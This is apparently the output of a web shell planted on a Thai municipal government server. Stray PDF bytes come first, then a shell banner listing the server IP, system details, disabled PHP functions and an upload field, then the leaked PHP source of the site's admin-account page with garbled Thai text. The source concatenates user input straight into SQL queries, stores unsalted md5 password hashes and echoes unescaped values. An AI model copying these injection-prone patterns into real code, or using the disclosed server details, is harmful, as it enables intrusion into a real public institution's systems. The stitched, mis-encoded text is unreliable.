%PDF-1.5 % ºaâÚÎΞ-ÌE1�ØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY
| Server IP : 122.155.177.87 / Your IP : 122.155.177.87 Web Server : Apache/2 System : Linux cat177-87.static.lnwhostname.com 3.10.0-1160.62.1.el7.x86_64 #1 SMP Tue Apr 5 16:57:59 UTC 2022 x86_64 User : phunphin ( 1164) PHP Version : 5.3.29 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,putenv,eval MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/phunphin/domains/phunphin.go.th/public_html/admin/ |
Upload File : |
<?
session_start();
if( !isset($_SESSION["user"]) || !isset($_SESSION["passwd"]) ){
session_destroy();
$message="¡ÃØ³Ò Login ¡è͹ !";
$url="index.php";
include "alert.php";
die;exit;
}
require_once('Connections/conndb.php');
$pass5 = md5($_SESSION["passwd"]);
$uname = $_SESSION["user"];
$ulevel = $_SESSION["level"];
$query_m = "select * from tbl_admin where user_name='$uname' and user_password='$pass5' ";
$result_m = mysql_query($query_m) or die(mysql_error());
$num_rows = mysql_num_rows($result_m);
if ($num_rows > 0 )
{
$chk_add = $_POST["chk_add"];
if($chk_add==1){
//à¾ÔèÁ¢éÍÁÙÅ
if($ulevel==1){
$u_name = $_POST["u_aname"];
$u_name = trim($u_name);
if(Empty($u_name) or !isset($u_name) or ($u_name=="")){
include("Connections/close_db.php");
echo "ERROR empty value <p><a href='add_admin.php#top'>Back to Main</a></p>"; die;
}
$sql = "select user_name from tbl_admin where (user_name='$u_name') ";
$dbquery = mysql_query($sql) or die("Can't send query !!");
$num_rows = mysql_num_rows($dbquery);
if($num_rows > 0) {
include("Connections/close_db.php");
echo "<br /><h3><p align=\"center\"><font color='#FFFFFF'>'User name : '".$u_name." ÁÕÍÂÙèáÅéÇã¹°Ò¹¢éÍÁÙÅ äÁèÊÒÁÒöà¾ÔèÁä´é</font></p></h3><br />";
echo "<p align=\"center\"><a href=\"add_admin.php#top\">¡ÅѺ˹éÒà¾ÔèÁ¼Ùé´ÙáÅÃкº</a></p><br />";
die;
}else
{
$now = date("Y-m-d H:i:s",time());
$pass = trim($_POST["u_apassword"]);
$pass = md5($pass);
$u_level = $_POST["u_alevel"];
$u_firstname = $_POST["u_afirstname"];
$u_lastname = $_POST["u_alastname"];
$u_phone = $_POST["u_aphone"];
$sql = "insert into tbl_admin (id,user_name,user_password,user_level,user_firstname,user_lastname,user_phone,udate,user_update) values ('','$u_name','$pass','$u_level','$u_firstname','$u_lastname','$u_phone','$now','$uname')";
$dbquery = mysql_query($sql) or die("Can't send query !A");
}
} else {
include("Connections/close_db.php");
echo "<br /><h3><p align=\"center\"><font color='#FFFFFF'>'User name' ".$uname." äÁèÊÒÁÒöà¾ÔèÁ¼Ùé´ÙáÅÃкºä´é</font></p></h3><br />";
echo "<p align=\"center\"><a href=\"main.php\">¡ÅѺ˹éÒËÅÑ¡</a></p><br />";
die;
//echo "<Script language=\"javascript\">window.location=\"admin.php\"</script>";
}
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!-- InstanceBegin template="/Templates/template_a.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<!-- InstanceEndEditable -->
<?php
require_once('Connections/conndb.php');
mysql_select_db($database_conndb, $conndb);
?>
<title>ͧ¤ì¡ÒúÃÔËÒÃÊèǹµÓºÅ¾Ø¹¾Ô¹ µÓºÅ¾Ø¹¾Ô¹ ÍÓàÀ;ع¾Ô¹ ¨Ñ§ËÇÑ´ÊØÃÒÉ®Ãì¸Ò¹Õ : http://www.phunphin.go.th</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../styles.css" rel="stylesheet" type="text/css">
<!-- InstanceBeginEditable name="head" --><style type="text/css">
<!--
a:link {
text-decoration: none;
}
a:visited {
text-decoration: none;
}
a:hover {
text-decoration: none;
}
a:active {
text-decoration: none;
}
-->
</style><!-- InstanceEndEditable -->
<!-- You can use Open Graph tags to customize link previews.
Learn more: https://developers.facebook.com/docs/sharing/webmasters -->
<meta property="og:url" content="https://www.your-domain.com/your-page.html" />
<meta property="og:type" content="website" />
<meta property="og:title" content="Your Website Title" />
<meta property="og:description" content="Your description" />
<meta property="og:image" content="https://www.your-domain.com/path/image.jpg" />
<style type="text/css">
<!--
body {
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-color:#006cd8;
}
-->
</style>
<!--styles -->
<link href="../styles.css" rel="stylesheet" type="text/css" />
<!--styles -->
<style type="text/css">
<!--
a:link {
text-decoration: none;
}
a:visited {
text-decoration: none;
}
a:hover {
text-decoration: none;
}
a:active {
text-decoration: none;
}
.style1 {color: #000000}
-->
</style>
<!--font-->
<link href="https://fonts.googleapis.com/css?family=Chakra+Petch|Kanit|Pridi&display=swap" rel="stylesheet">
<!--font-->
<style type="text/css">
<!--
.style4 {font-family: 'Chakra Petch', sans-serif}
-->
</style>
</head>
<body background="../images/0bg1.png" style="background-repeat:no-repeat; background-position:top">
<!-- content -->
<div align="center">
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="605" align="center" valign="top"> </td>
</tr>
<tr>
<td height="55" align="center" valign="top"><table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="top"><a href="http://www.phunphin.go.th/index.php"><img src="../images/1menutop_01.png" alt=""/></a></td>
<td align="center" valign="top"><a href="http://www.phunphin.go.th/news.php?cat_id=1"><img src="../images/1menutop_02.png" alt=""/></a></td>
<td align="center" valign="top"><a href="http://www.phunphin.go.th/news.php?cat_id=2"><img src="../images/1menutop_03.png" alt=""/></a></td>
<td align="center" valign="top"><a href="http://www.phunphin.go.th/albums/index.php"><img src="../images/1menutop_04.png" alt=""/></a></td>
<td align="center" valign="top"><a href="http://www.phunphin.go.th/contacts/?scon_id=4"><img src="../images/1menutop_05.png" alt=""/></a></td>
<td align="center" valign="top"><a href="http://www.phunphin.go.th/office.php"><img src="../images/1menutop_06.png" alt=""/></a></td>
</tr>
</table></td>
</tr>
<tr>
<td align="center"> </td>
</tr>
<tr>
<td align="center" valign="top"> </td>
</tr>
<tr>
<td align="center" valign="top">
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="top">
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="top"><img src="../images/bg_con2_01.png" width="100"></td>
</tr>
<tr>
<td align="center" valign="top" background="../images/bg_con2_02.png" style="background-repeat:repeat; background-position:top"><table width="95%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="top"><!-- InstanceBeginEditable name="EditRegion3" -->
<table width="95%" border="0" cellspacing="0">
<tr align="center" >
<td height="22" align="left" class="styles1"> </td>
</tr>
<tr align="center" >
<td height="22" align="left" class="styles1"><div align="right" style="color:#000;"><a href="main.php#top" class="styles1" style="color:#000;">˹éÒ Admin</a> |
<?if($ulevel==1){?>
<a href="add_admin.php#top" class="styles1" style="color:#000;">¢éÍÁÙżÙé´ÙáÅÃкº</a>
<?} else {?>
<a href="changepass.php#top" class="styles1" style="color:#000;">à»ÅÕè¹ÃËÑʼèÒ¹</a>
<?}?>
| <a href="signout.php" class="styles1" style="color:#000;">ÍÍ¡¨Ò¡Ãкº </a></div></td>
</tr>
<tr>
<td align="center" valign="top"> </td>
</tr>
<tr>
<td align="center" valign="top">
<table width="100%" cellspacing="0" cellpadding="0">
<tr>
<td valign="top">
<table width="100%" border="0" cellpadding="2" cellspacing="2" bgcolor="#FFFFFF" class="box1">
<tr>
<td width="100%" height="25" background="../images/bg4.gif" class="styles" ><div align="center" class="title3">à¾ÔèÁ¼Ùé´ÙáÅÃкº</div></td>
</tr>
<form name="form1" method="post" action="add_admin.php#top" onSubmit="return check();" autocomplete="off">
<tr>
<td>
<table width="100%" border="0" cellspacing="2" cellpadding="2" align="center">
<tr>
<td colspan="2"> </td>
</tr>
<tr>
<td align="right" width="35%">User name :: </td>
<td><input type="text" name="u_aname" id="u_aname" size="30" maxlength="25" required placeholder="user name" autocomplete="cc-name"></td>
</tr>
<tr>
<td align="right">ÃËÑʼèÒ¹ :: </td>
<td><input type="password" name="u_apassword" id="u_apassword" size="30" maxlength="35" required placeholder="password" autocomplete="cc-password"></td>
</tr>
<tr>
<td align="right">Â×¹ÂѹÃËÑʼèÒ¹ :: </td>
<td><input type="password" name="c_apassword" id="c_apassword" size="30" maxlength="25" required placeholder="confirm password" autocomplete="cc-conpassword"></td>
</tr>
<tr>
<td align="right">ÃдѺ¡ÒÃãªé§Ò¹ :: </td>
<td>
<select name="u_alevel" id="u_alevel">
<option value="2">2</option>
<option value="1">1</option>
</select>
<!--<input type="text" name="u_alevel" id="u_alevel" size="2" maxlength="1" >--></td>
</tr>
<tr>
<td align="right">ª×èÍ :: </td>
<td>
<input type="text" name="u_afirstname" id="u_afirstname" size="30" maxlength="30" ></td>
</tr>
<tr>
<td align="right">¹ÒÁÊ¡ØÅ :: </td>
<td><input type="text" name="u_alastname" id="u_alastname" size="30" maxlength="30" ></td>
</tr>
<tr>
<td align="right">àºÍÃìâ·Ã :: </td>
<td><input type="text" name="u_aphone" id="u_aphone" size="30" maxlength="25" ></td>
</tr>
<tr>
<td colspan="2"> </td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="hidden" name="chk_add" value="1">
<input type="submit" name="Submit" value="ºÑ¹·Ö¡¢éÍÁÙÅ">
</td>
</tr>
<tr>
<td colspan="2"> </td>
</tr>
</table>
</td>
</tr>
</form>
<tr bgcolor="#6699CC">
<td align="center"><font color="#FFFFFF"><b>áÊ´§¢éÍÁÙżÙé´ÙáÅÃкº</b></font></td>
</tr>
<tr>
<td valign="top">
<table width="100%" align="center" cellspacing="0" cellpadding="0" height="23" frame="below" >
<tr bgcolor="#CCCCCC">
<td width="10%">
</td>
<td width="15%">User name
</td>
<td width="35%">ª×èÍ-¹ÒÁÊ¡ØÅ
</td>
<td width="10%" align="center">User ID
</td>
<td width="10%" align="center">level
</td>
<td width="20%">àºÍÃìâ·Ã
</td>
</tr>
</table>
<table width="100%" border="0" align="center" cellspacing="2" cellpadding="1" bgcolor="#CCCCCC">
<?
$sql = "select * From tbl_admin where (id > 0) ";
$sql .= "Order by id Asc ";
/* µÑ駤èÒ áÊ´§¼ÅµèÍ˹éÒ $Per_Page */
$item = 0;
$Per_Page =30;
if(!$_GET['Page']){
$Page=1;
}else{
$Page = $_GET['Page'];
}
$Prev_Page = $Page-1;
$Next_Page = $Page+1;
$result = mysql_query($sql);
$Page_start = ($Per_Page*$Page)-$Per_Page;
$Num_Rows = mysql_num_rows($result);
if($Num_Rows<=$Per_Page)
$Num_Pages =1;
else if(($Num_Rows % $Per_Page)==0)
$Num_Pages =($Num_Rows/$Per_Page) ;
else
$Num_Pages =($Num_Rows/$Per_Page) +1;
$Num_Pages = (int)$Num_Pages;
if(($Page>$Num_Pages) || ($Page<0))
print "<center><b>ÂѧäÁèÁÕ¢éÍÁÙÅ<b></center>";
//print "<center><b>¨Ó¹Ç¹ $Page ÁÒ¡¡ÇèÒ $Num_Pages ÂѧäÁèÁÕ¢éͤÇÒÁ<b></center>";
$sql .= "LIMIT $Page_start , $Per_Page";
//ÊèǹáÊ´§¼Å
$result = mysql_query($sql);
$item = ($Page-1) * $Per_Page;
While($row= mysql_fetch_assoc($result)){
$item = $item + 1;
$code_id = $row["id"];
$code_1 = $row["user_name"];
$code_2 = $row["user_firstname"];
$code_3 = $row["user_lastname"];
$name = $code_2." ".$code_3;
$code_4 = $row["user_level"];
$code_5 = $row["user_phone"];
$bcolor = "#ffffff";
if(($item %2)==0){
$bcolor = "#e5e5e5";
}
?>
<tr bgcolor="<?=$bcolor;?>">
<td width="5%">
<div align="center">
<?
echo "<a href='edit_admin.php?code_id=$code_id#top'>á¡éä¢</a>";
?>
</div>
</td>
<td width="5%">
<div align="center">
<?
if($code_id>1){
echo "<a href='del_data.php?code_id=$code_id&chk_p=1&code_1=$code_1#top'>ź</a>";
}
?>
</div>
</td>
<td width="15%">
<?= $code_1;?>
</td>
<td width="35%">
<?= $name;?>
</td>
<td width="10%" align="center">
<?= $code_id;?>
</td>
<td width="10%" align="center">
<?= $code_4;?>
</td>
<td width="20%">
<?= $code_5;?>
</td>
</tr>
<?}?>
</table>
<hr align="center" width="100%" noshade size="1">
<div align="right">
¼Ùé´ÙáÅÃкº·Ñé§ËÁ´ :
<?= $Num_Rows." ";?> 
<!--¨Ó¹Ç¹Ë¹éÒ·Ñé§ËÁ´ : <b> -->
<?//=$Num_Pages;?>
<? if($Num_Rows>30){ echo "˹éÒ : ";}?>
<?/* ÊÃéÒ§»ØèÁÂé͹¡ÅѺ */
if($Prev_Page)
echo " <a href='$PHP_SELF?Page=$Prev_Page'><< Âé͹¡ÅѺ </a>";
$Show_Page = 10;
$i1 = $Page / $Show_Page;
$i2 = $Page % $Show_Page;
$i1 = (int)$i1;
for($i=1; $i<=$Num_Pages; $i++)
{
if($i != $Page)
{
if($i1 > 0)
{
$i3 = (($Show_Page * $i1) + $i2) - $Show_Page;
$i3 = $i3 + 1;
if(($i >= $i3) && ($i < $Page))
echo "[<a href='$PHP_SELF?Page=$i'>$i</a>]";
}else
{
if($i <= $Show_Page)
echo "[<a href='$PHP_SELF?Page=$i'>$i</a>]";
}
}
else
{
if($i > 1){
echo "<b> $i </b>";
}
}
}
/*ÊÃéÒ§»ØèÁà´Ô¹Ë¹éÒ */
if($Page!=$Num_Pages)
echo "<a href ='$PHP_SELF?Page=$Next_Page'> ˹éÒ¶Ñ´ä»>> </a>";
?>
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td align="center" valign="top"> </td>
</tr>
</table>
<!-- InstanceEndEditable --></td>
</tr>
</table></td>
</tr>
<tr>
<td align="center" valign="top"><img src="../images/bg_con2_04.png" width="1000"></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td align="center" valign="top"><a href="http://main.pasworld.co.th" target="_blank"><img src="../images/foot.png" width="1000" height="115" alt=""/></a></td>
</tr>
</table>
</div>
<!-- end_content -->
<tr><td><a style="display:scroll;position:fixed;bottom:5px;right:5px;" class="backtotop" href="#top" rel="nofollow" title="Back to Top"><img src="../images/up.png" border="0" /></a></td>
</tr>
</body>
<!-- InstanceEnd --></html>
<?
include("Connections/close_db.php");
} else {
session_destroy();
include("Connections/close_db.php");
$message="Username or Password Incorrect !";
$url="index.php";
include "alert.php";
}
?>